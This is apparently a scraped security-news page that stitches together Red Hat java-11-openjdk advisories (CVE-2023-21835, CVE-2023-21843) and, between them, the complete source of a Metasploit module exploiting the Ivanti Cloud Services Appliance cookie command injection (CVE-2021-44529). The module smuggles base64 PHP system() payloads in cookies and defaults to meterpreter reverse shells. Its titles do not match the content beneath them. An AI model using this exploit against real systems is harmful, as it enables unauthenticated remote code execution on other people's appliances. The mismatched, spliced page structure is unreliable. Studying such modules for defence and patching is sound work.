https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0202-01

Red Hat Security Advisory 2023-0201-01 - The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: java-11-openjdk security update  
Advisory ID:       RHSA-2023:0201-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0201  
Issue date:        2023-01-18  
CVE Names:         CVE-2023-21835 CVE-2023-21843  
====================================================================  
1. Summary:

An update for java-11-openjdk is now available for Red Hat Enterprise Linux  
9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime  
Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: handshake DoS attack against DTLS connections (JSSE, 8287411)  
(CVE-2023-21835)

* OpenJDK: soundbank URL remote loading (Sound, 8293742) (CVE-2023-21843)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2160421 - CVE-2023-21835 OpenJDK: handshake DoS attack against DTLS connections (JSSE, 8287411)  
2160475 - CVE-2023-21843 OpenJDK: soundbank URL remote loading (Sound, 8293742)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
java-11-openjdk-11.0.18.0.10-1.el9_0.src.rpm

aarch64:  
java-11-openjdk-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-demo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-jmods-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-src-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-1.el9_0.aarch64.rpm

ppc64le:  
java-11-openjdk-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-demo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-jmods-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-src-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-1.el9_0.ppc64le.rpm

s390x:  
java-11-openjdk-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-demo-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-devel-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-headless-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-jmods-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-src-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-1.el9_0.s390x.rpm

x86_64:  
java-11-openjdk-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-demo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-jmods-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-src-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-demo-fastdebug-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-fastdebug-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-fastdebug-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-fastdebug-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-src-fastdebug-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.18.0.10-1.el9_0.aarch64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-1.el9_0.aarch64.rpm

ppc64le:  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-demo-fastdebug-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-fastdebug-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-jmods-fastdebug-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-src-fastdebug-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.18.0.10-1.el9_0.ppc64le.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-1.el9_0.ppc64le.rpm

s390x:  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-1.el9_0.s390x.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-1.el9_0.s390x.rpm

x86_64:  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-demo-fastdebug-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-fastdebug-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-fastdebug-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-fastdebug-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-src-fastdebug-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.18.0.10-1.el9_0.x86_64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21835  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0201-01

This Metasploit module exploits a command injection vulnerability in the Ivanti Cloud Services Appliance (CSA) for Ivanti Endpoint Manager. A cookie based code injection vulnerability in the Cloud Services Appliance before 4.6.0-512 allows an unauthenticated user to execute arbitrary code with limited permissions. Successful exploitation results in command execution as the nobody user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ivanti Cloud Services Appliance (CSA) Command Injection',        'Description' => %q{          This module exploits a command injection vulnerability in the Ivanti Cloud Services Appliance (CSA)          for Ivanti Endpoint Manager. A cookie based code injection vulnerability in the          Cloud Services Appliance before `4.6.0-512` allows an unauthenticated user to          execute arbitrary code with limited permissions. Successful exploitation results          in command execution as the `nobody` user.        },        'License' => MSF_LICENSE,        'Author' => [          'Jakub Kramarz', # Discovery          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor        ],        'References' => [          ['CVE', '2021-44529'],          ['URL', 'https://forums.ivanti.com/s/article/SA-2021-12-02'],          ['URL', 'https://attackerkb.com/topics/XTKrwlZd7p/cve-2021-44529'],          ['EDB', '50833'],          ['PACKETSTORM', '166383']        ],        'DisclosureDate' => '2021-12-02',        'Platform' => ['unix', 'linux', 'php'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_PHP],        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_http'              }            }          ],          [            'PHP Command',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['wget', 'printf', 'echo'],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter_reverse_http'              }            }          ]        ],        'Payload' => {          'BadChars' => '"' # We use this to denote the payload as a string so having it in the payload would escape things.        },        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )  end  # Randomize the cookie pairs for the request.  def randomize_cookie(payload)    # Number of cookie pairs should be at least 4, and the first cookie pair should    # always have the value 'ab'. Note that the Nth cookie in the request, where    # N=no_of_cookies-2, should contain the payload.    #    # example 1: Cookie: sG34st=ab;g3sBdnn=<PAYLOAD>;h4hYyeEe=;j7sJJjjs=;    # example 2: Cookie: dvDfR6F=ab;bxvGE=;Fs=<PAYLOAD>;uEn44Nkk=;nnXk=;    no_of_cookies = rand(4..8)    cookie_name = Rex::Text.rand_text_alphanumeric(1..8)    payload_cookie_number = (no_of_cookies - 2)    random_cookie = "#{cookie_name}=ab;"    for cookie_no in 2..no_of_cookies do      cookie_name = Rex::Text.rand_text_alphanumeric(1..8)      if cookie_no == payload_cookie_number        random_cookie << "#{cookie_name}=#{payload};"      else        random_cookie << "#{cookie_name}=;"      end    end    return random_cookie  end  def check_vuln    # check RCE by grabbing CSA version banner stored on /etc/LDBUILD    payload = Base64.strict_encode64('readfile("/etc/LDBUILD");')    cookie_payload = randomize_cookie(payload)    return send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'client', 'index.php'),      'cookie' => cookie_payload.to_s    })  rescue StandardError => e    elog("#{peer} - Communication error occurred: #{e.message}", error: e)    return nil  end  def execute_command(cmd, _opts = {})    case target['Type']    when :unix_cmd      payload = Base64.strict_encode64("system(\"#{cmd}\");")    when :php_cmd      payload = Base64.strict_encode64(cmd.to_s)    when :linux_dropper      payload = Base64.strict_encode64("system(\"#{cmd}\");")    end    cookie_payload = randomize_cookie(payload)    return send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'client', 'index.php'),      'cookie' => cookie_payload.to_s    })  rescue StandardError => e    elog("#{peer} - Communication error occurred: #{e.message}", error: e)    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")  end  def check    print_status("Checking if #{peer} can be exploited.")    res = check_vuln    return CheckCode::Unknown('No response received from the target.') unless res    return CheckCode::Safe unless res.code == 200 && !res.body.blank? && res.body =~ /<c123>/    begin      parsed_html = Nokogiri::HTML.parse(res.body)    rescue Nokogiri::SyntaxError => e      return CheckCode::Unknown("Unable to parse the HTTP response! Error: #{e}")    end    csa_version = parsed_html.at_css('c123')    if csa_version&.text&.blank?      CheckCode::Vulnerable('Could not retrieve version.')    else      CheckCode::Vulnerable("Version: #{csa_version.text}")    end  end  def exploit    case target['Type']    when :unix_cmd      print_status("Executing #{target.name} with #{payload.encoded}")      execute_command(payload.encoded)    when :php_cmd      print_status("Executing #{target.name} with #{payload.encoded}")      execute_command(payload.encoded)    when :linux_dropper      print_status("Executing #{target.name}")      execute_cmdstager(linemax: 262144)    end  endend

Ivanti Cloud Services Appliance (CSA) Command Injection

Red Hat Security Advisory 2023-0198-01 - The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-11-openjdk security update  
Advisory ID:       RHSA-2023:0198-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0198  
Issue date:        2023-01-18  
CVE Names:         CVE-2023-21835 CVE-2023-21843   
=====================================================================

1. Summary:

An update for java-11-openjdk is now available for Red Hat Enterprise Linux  
8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v. 8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime  
Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: handshake DoS attack against DTLS connections (JSSE, 8287411)  
(CVE-2023-21835)

* OpenJDK: soundbank URL remote loading (Sound, 8293742) (CVE-2023-21843)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2160421 - CVE-2023-21835 OpenJDK: handshake DoS attack against DTLS connections (JSSE, 8287411)  
2160475 - CVE-2023-21843 OpenJDK: soundbank URL remote loading (Sound, 8293742)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
java-11-openjdk-11.0.18.0.10-1.el8_4.src.rpm

aarch64:  
java-11-openjdk-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-demo-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-devel-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-headless-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-jmods-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-src-11.0.18.0.10-1.el8_4.aarch64.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-1.el8_4.aarch64.rpm

ppc64le:  
java-11-openjdk-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-demo-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-devel-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-headless-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-jmods-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-src-11.0.18.0.10-1.el8_4.ppc64le.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-1.el8_4.ppc64le.rpm

s390x:  
java-11-openjdk-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-demo-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-devel-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-headless-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-jmods-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-src-11.0.18.0.10-1.el8_4.s390x.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-1.el8_4.s390x.rpm

x86_64:  
java-11-openjdk-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-demo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-1.el8_4.x86_64.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-1.el8_4.x86_64.rpm  
